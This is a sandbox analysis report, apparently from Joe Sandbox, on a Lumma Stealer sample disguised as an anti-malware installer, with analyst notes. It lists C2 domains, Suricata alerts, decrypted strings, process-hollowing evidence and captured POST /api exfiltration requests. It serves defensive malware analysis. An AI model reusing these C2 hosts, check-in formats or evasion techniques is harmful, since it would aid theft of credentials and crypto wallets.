
Windows Analysis Report
anti-malware-setup.exe

Overview

General Information

Sample name: anti-malware-setup.exe
Analysis ID: 1587433
MD5: fedb69af5de74d46366ad0570e77d9ac
SHA1: a85c8c91780e9366fafc2aba2d13e5b3a49c37ba
SHA256: 61316bc78fb84aaa2d5fd1e10aec9a8cf96ab5ac7ee1436048eb7fd199045310
Tags: exe, user-zhuzhu0009

Detection

Detection: LummaC
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • anti-malware-setup.exe (PID: 4996, cmdline: "C:\Users\user\Desktop\anti-malware-setup.exe", MD5: FEDB69AF5DE74D46366AD0570E77D9AC)
    • BitLockerToGo.exe (PID: 6204, cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Threat name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration (LummaC):
{"C2 url": ["shapestickyr.lat", "manyrestro.lat", "curverpluch.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "enterwahsh.biz"], "Build id": "HpOoIh--bd4e81951306"}
YARA matches (network capture):

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

YARA matches (memory dumps and process memory):

Source | Rule | Description | Author | Strings
00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: BitLockerToGo.exe PID: 6204 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: BitLockerToGo.exe PID: 6204 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: BitLockerToGo.exe PID: 6204 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

Note on the Msfpayloads_msf_9 hit: the only matched string is 4d 5a 90 00 03 00 00 00 at offset 0, which is simply the start of a standard MZ/DOS header. The rule fired on a PE image sitting in a private, writable memory region of anti-malware-setup.exe (the 00000000 process index), which is consistent with the signatures "Injects a PE file into a foreign process" and "Writes to foreign memory regions"; it is not evidence of a Metasploit payload.
              No Sigma rule has matched
Suricata IDS alerts (the per-rule tables merged into one, sorted by timestamp; rule names taken from the Networking section below):

Timestamp | SID | Sev | Classtype | Source | Destination | Proto | Rule
2025-01-10T11:34:27.592980+0100 | 2058608 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:49919 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)
2025-01-10T11:34:27.613414+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:51023 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)
2025-01-10T11:34:27.623847+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:63976 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)
2025-01-10T11:34:27.636200+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:65283 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)
2025-01-10T11:34:27.646656+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:57991 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)
2025-01-10T11:34:27.658561+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:57035 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)
2025-01-10T11:34:27.673815+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:58483 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)
2025-01-10T11:34:27.684905+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:50267 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)
2025-01-10T11:34:27.695225+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:55149 | 1.1.1.1:53 | UDP | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)
2025-01-10T11:34:28.390611+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49770 | 104.102.49.254:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:28.908331+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5:49770 | 104.102.49.254:443 | TCP | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup
2025-01-10T11:34:29.481329+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49780 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:29.915029+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5:49780 | 104.21.48.1:443 | TCP | ET MALWARE Lumma Stealer Related Activity
2025-01-10T11:34:29.915029+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:49780 | 104.21.48.1:443 | TCP | ET MALWARE Lumma Stealer CnC Host Checkin
2025-01-10T11:34:30.467471+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49787 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:30.952361+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5:49787 | 104.21.48.1:443 | TCP | ET MALWARE Lumma Stealer Related Activity M2
2025-01-10T11:34:30.952361+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:49787 | 104.21.48.1:443 | TCP | ET MALWARE Lumma Stealer CnC Host Checkin
2025-01-10T11:34:31.736399+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49796 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:33.191826+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:49805 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:34.476499+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:61984 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:35.105358+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5:61984 | 104.21.48.1:443 | TCP | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration
2025-01-10T11:34:37.015416+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:62001 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:39.107891+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:62017 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:40.315230+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5:62024 | 104.21.48.1:443 | TCP | ET JA3 Hash - Possible Malware - Fake Firefox Font Update
2025-01-10T11:34:40.780403+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5:62024 | 104.21.48.1:443 | TCP | ET MALWARE Lumma Stealer CnC Host Checkin

Read top to bottom, the timeline is the useful part of this table. All nine domains from the extracted configuration are looked up within roughly 100 ms and every one returns NXDOMAIN (see the DNS entries in the Networking section). One second later the sample fetches a Steam community profile over the 104.102.49.254 flow (alert 2858666), and immediately afterwards the check-in alerts (2054653, 2049836, 2049812) and the exfiltration alert (2048094) fire on flows to 104.21.48.1. The only check-in-shaped requests in the HTTP section are the POST /api requests to sputnik-1985.com, a host that does not appear in the static configuration at all. Recovering a live C2 domain from a Steam profile when the hardcoded list is dead is a documented Lumma fallback; the report shows the sequence but not the decoded profile, so treat the link between the Steam lookup and sputnik-1985.com as inferred from the traffic order. The practical consequence is that blocking the nine configured domains alone would not have stopped this run. The severity-3 JA3 alerts (2028371) are a generic TLS client fingerprint rule and are low fidelity on their own; they become useful here only because the same fingerprint precedes every C2 flow.


              AV Detection

Source: https://sputnik-1985.com/v | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/api | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/~ | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/ | Avira URL Cloud: Label: malware
Source: enterwahsh.biz | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/apiate | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com:443/api | Avira URL Cloud: Label: malware
Source: https://sputnik-1985.com/U70 | Avira URL Cloud: Label: malware

Only POST /api to sputnik-1985.com appears in the captured traffic (see the HTTP requests in the Networking section); the other URL variants above (/v, /~, /apiate, /U70) are fragments recovered from process memory, so use the host name rather than those paths as the indicator.

Source: 0.2.anti-malware-setup.exe.1dd0000.1.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "manyrestro.lat", "curverpluch.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "enterwahsh.biz"], "Build id": "HpOoIh--bd4e81951306"}
Source: anti-malware-setup.exe | VirusTotal: Detection: 72%
Source: anti-malware-setup.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Strings recovered by the string decryptor, all from one memory dump of the parent process (00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmp):

String decryptor: bashfulacid.lat
String decryptor: tentabatte.lat
String decryptor: curverpluch.lat
String decryptor: talkynicer.lat
String decryptor: shapestickyr.lat
String decryptor: manyrestro.lat
String decryptor: slipperyloo.lat
String decryptor: wordyfindy.lat
String decryptor: enterwahsh.biz
String decryptor: lid=%s&j=%s&ver=4.0
String decryptor: TeslaBrowser/5.5
String decryptor: - Screen Resoluton:
String decryptor: - Physical Installed Memory:
String decryptor: Workgroup: -
String decryptor: HpOoIh--bd4e81951306

The decrypted set covers the C2 list, the check-in body format (lid=%s&j=%s&ver=4.0), the build id, host-fingerprint labels (the "Resoluton" misspelling is the malware's own) and the "TeslaBrowser/5.5" user agent that Malpedia associates with the family. Note that the requests actually seen on the wire in this run carry a Chrome 119 user agent instead, so hunting rules should match on both.

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_004165E4 CryptUnprotectData

CryptUnprotectData is the DPAPI call needed to decrypt the locally protected secrets browsers store (saved-credential blobs and the Chromium master key), which is the mechanism behind "Tries to harvest and steal browser information". It executes inside the hollowed BitLockerToGo.exe (process index 3), not in the dropper.
Source: anti-malware-setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: anti-malware-setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49787 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:61984 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62001 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62017 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62024 version: TLS 1.2

Source: Binary string: BitLockerToGo.pdb | source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL | source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp

The PDB path of BitLockerToGo.exe turning up in the dropper's own memory (the same dump, 2322019566, in which the MZ-header YARA rule matched) means the dropper held a copy of the host binary's image before it created and hollowed the child process.
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then <instruction> (one row per site; evidence for "Found inlined nop instructions"; right-hand column is the function address in the 3_2_xxxxxxxx dump):

4x nop then push edi | 3_2_0040C885
4x nop then cmp dword ptr [edi+edx*8], 53BABCE5h | 3_2_0040D307
4x nop then lea eax, dword ptr [esi-000010AAh] | 3_2_00409B20
4x nop then movzx ecx, word ptr [esp+eax*2+7A8ED03Eh] | 3_2_00436C90
4x nop then jmp ecx | 3_2_0043BD70
4x nop then movzx edx, word ptr [esp+ecx*2+000001A0h] | 3_2_00409D39
4x nop then mov word ptr [edx], cx | 3_2_004165E4
4x nop then lea ecx, dword ptr [eax+0000520Ch] | 3_2_0040D5FD
4x nop then lea ecx, dword ptr [eax+0000133Bh] | 3_2_0042AF24
4x nop then cmp dword ptr [ebp+ebx*8+00h], 5C2B5D44h | 3_2_0043BFCD
4x nop then mov word ptr [eax], cx | 3_2_004227F6
4x nop then movzx ecx, word ptr [esp+eax*2+00000274h] | 3_2_0042AF9F
4x nop then mov byte ptr [edi], cl | 3_2_0042A855
4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh] | 3_2_004088C0
4x nop then mov edx, ecx | 3_2_004258C0
4x nop then mov byte ptr [ecx], dl | 3_2_004258C0
4x nop then lea edx, dword ptr [ecx-000051A8h] | 3_2_004258C0
4x nop then mov word ptr [eax], cx | 3_2_004278E0
4x nop then movzx ebx, byte ptr [edx] | 3_2_004340E0
4x nop then mov byte ptr [edi], cl | 3_2_0041A8EF
4x nop then lea edx, dword ptr [ecx+00001E9Fh] | 3_2_0041508C
4x nop then movzx edx, word ptr [esp+ecx*2+1Ch] | 3_2_0041508C
4x nop then mov byte ptr [ebx], al | 3_2_0041508C
4x nop then lea edx, dword ptr [ecx-5F5E1539h] | 3_2_0043D090
4x nop then cmp dword ptr [edi+edx*8], 2213E57Fh | 3_2_004218B7
4x nop then movzx ecx, word ptr [esp+eax*2+00000128h] | 3_2_00417941
4x nop then mov word ptr [edx], ax | 3_2_00417941
4x nop then lea edx, dword ptr [ecx-5F5E1539h] | 3_2_0043D140
4x nop then movzx edi, word ptr [esp+edx*2-000126A4h] | 3_2_0041695C
4x nop then mov byte ptr [ebx], al | 3_2_0042C109
4x nop then cmp dword ptr [ebx+edi*8], 385488F2h | 3_2_00437910
4x nop then mov edx, eax | 3_2_004029D0
4x nop then lea edx, dword ptr [ecx-5F5E1539h] | 3_2_0043D1D0
4x nop then mov ebx, eax | 3_2_00405980
4x nop then mov ebp, eax | 3_2_00405980
4x nop then cmp byte ptr [esi+ebx], 00000000h | 3_2_00429260
4x nop then movzx esi, word ptr [esp+eax*2-7A433DC6h] | 3_2_0043B26F
4x nop then movzx esi, word ptr [ecx] | 3_2_00413A20
4x nop then mov word ptr [eax], cx | 3_2_00421220
4x nop then mov edi, ecx | 3_2_0041AAD8
4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0041E29F
4x nop then cmp dword ptr [edx+ecx*8], 0985CAF0h | 3_2_0040E2A0
4x nop then mov byte ptr [eax], bl | 3_2_0040CB05
4x nop then movzx ecx, word ptr [esp+eax*2+00000086h] | 3_2_0042631D
4x nop then movzx esi, word ptr [esp+eax*2+14h] | 3_2_0042A322
4x nop then movzx ecx, word ptr [esp+eax*2+10027EC6h] | 3_2_0041B3C6
4x nop then movzx edx, word ptr [esp+ecx*2+00000170h] | 3_2_0042C477
4x nop then mov ebx, dword ptr [edi+04h] | 3_2_00428CD0
4x nop then add eax, dword ptr [esp+ecx*4+2Ch] | 3_2_004074E0
4x nop then movzx ecx, word ptr [ebp+edi*4+00h] | 3_2_004074E0
4x nop then lea ecx, dword ptr [eax+0000133Bh] | 3_2_0042B4E1
4x nop then mov byte ptr [ecx], al | 3_2_0041ACF9
4x nop then mov byte ptr [ebx], cl | 3_2_0042ACBD
4x nop then mov byte ptr [edx], al | 3_2_0041A541
4x nop then mov byte ptr [edi], cl | 3_2_0041A541
4x nop then mov dword ptr [esp+44h], 2EAF22BBh | 3_2_0042B5BB
4x nop then mov dword ptr [esp+14h], ecx | 3_2_004205BC
4x nop then jmp ecx | 3_2_0043BE0A
4x nop then movzx ecx, word ptr [esp+eax*2-5E87212Eh] | 3_2_00414620
4x nop then movzx ecx, word ptr [esp+eax*2+02h] | 3_2_0041AE87
4x nop then movzx ecx, word ptr [esp+eax*2+10027EC6h] | 3_2_0041AE87
4x nop then movzx ebx, byte ptr [ecx+edx] | 3_2_0043AE90
4x nop then mov byte ptr [edi], cl | 3_2_0042A742
4x nop then cmp word ptr [ebp+ebx+02h], 0000h | 3_2_00420F50
4x nop then mov word ptr [eax], cx | 3_2_00420F50
4x nop then cmp dword ptr [edi+esi*8], 7F7BECC6h | 3_2_0043A770
4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_00429700
4x nop then cmp dword ptr [esi+edi*8], E81D91D4h | 3_2_0043DF30
4x nop then lea edx, dword ptr [ecx-5F5E1539h] | 3_2_0043CF30
4x nop then movzx edx, word ptr [esi+eax*2+54h] | 3_2_00419FDF
4x nop then mov byte ptr [edi], al | 3_2_00419FDF
4x nop then mov word ptr [ecx], dx | 3_2_0040DFF5
4x nop then mov byte ptr [edi], cl | 3_2_0042A7AD
4x nop then mov byte ptr [edi], cl | 3_2_0042A7BC

Two patterns in this list are worth a second look when reversing the payload. The repeated "cmp dword ptr [reg+reg*8], <32-bit constant>" sites (53BABCE5h, 5C2B5D44h, 2213E57Fh, 385488F2h, 0985CAF0h, 7F7BECC6h, E81D91D4h) walk 8-byte table entries comparing against fixed values, the shape of a hash-based lookup (API or string hashing); this is consistent with the "Sample uses string decryption to hide its real strings" and "Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)" signatures, though the report does not resolve which hashes they are. The "jmp ecx" sites (3_2_0043BD70, 3_2_0043BE0A) are indirect jumps through a register, matching "Uses code obfuscation techniques (call, push, ret)" and breaking straight-line disassembly.

              Networking

Source: Network traffic | Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:65283 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:50267 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:55149 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:63976 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:51023 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.5:49919 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:57991 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:58483 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:57035 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49770 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49780 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49780 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49787 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49787 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:61984 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:62024 -> 104.21.48.1:443
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: enterwahsh.biz
Source: unknown | DNS traffic detected: query: curverpluch.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: 53.210.109.20.in-addr.arpa reply code: Name error (3)
Source: unknown | DNS traffic detected: query: manyrestro.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: enterwahsh.biz reply code: Name error (3)
Source: unknown | DNS traffic detected: query: talkynicer.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: 198.187.3.20.in-addr.arpa reply code: Name error (3)
Source: unknown | DNS traffic detected: query: slipperyloo.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: tentabatte.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: shapestickyr.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: bashfulacid.lat reply code: Name error (3)
Source: unknown | DNS traffic detected: query: wordyfindy.lat reply code: Name error (3)

All nine configured C2 domains returned NXDOMAIN (reply code 3) in this run, which is what the signature "Tries to resolve many domain names, but no domain seems valid" records; the two in-addr.arpa entries are reverse lookups unrelated to the C2 list.

Source: global traffic | TCP traffic: 192.168.2.5:61982 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.21.48.1
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49780 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49770 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49787 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49796 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62001 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:61984 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62017 -> 104.21.48.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:62024 -> 104.21.48.1:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1; Connection: Keep-Alive; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 86; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=1HOV66FNDB7NHB; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12818; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=GR9J0UZM8CJ54HBX912; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15090; Host: sputnik-1985.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=ZYZGZAHRUJ4BYWG; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20556; Host: sputnik-1985.com
